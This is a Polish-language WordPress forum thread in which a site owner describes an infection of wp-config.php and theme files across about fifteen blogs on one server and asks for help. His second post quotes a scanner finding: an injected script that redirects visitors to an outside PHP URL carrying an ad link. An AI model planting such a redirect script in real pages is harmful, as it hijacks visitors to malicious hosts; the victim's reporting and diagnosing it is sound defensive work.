Thread Starter
djbit
(@djbit)
Faktycznie, wyszukałem część kodu, który został dodany do pliku wp-config.php w moim wypadku szukałem: „{return str_replace($” i faktycznie zainfekowane są wszystkie pliki index, header, functions z szablonów i kilka innych – masakra jakaś.
Tylko dziwi mnie fakt, że zainfekowane są wszystkie blogi na serwerze (około 15), czyli ktoś mi się włamał na serwer?
Thread Starter
djbit
(@djbit)
Dzięki.
Zeskanowałem bloga za pomocą Securi i pokazuje mi że wykrywa u mnie na stronie:
<body><script>top.location.replace("http://www.outperformthenorm.com/0cfac436b1807cfcd8ba68a1c36191e9.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102");</script>
Ale jak patrze w źródło strony to czegoś takiego nie ma.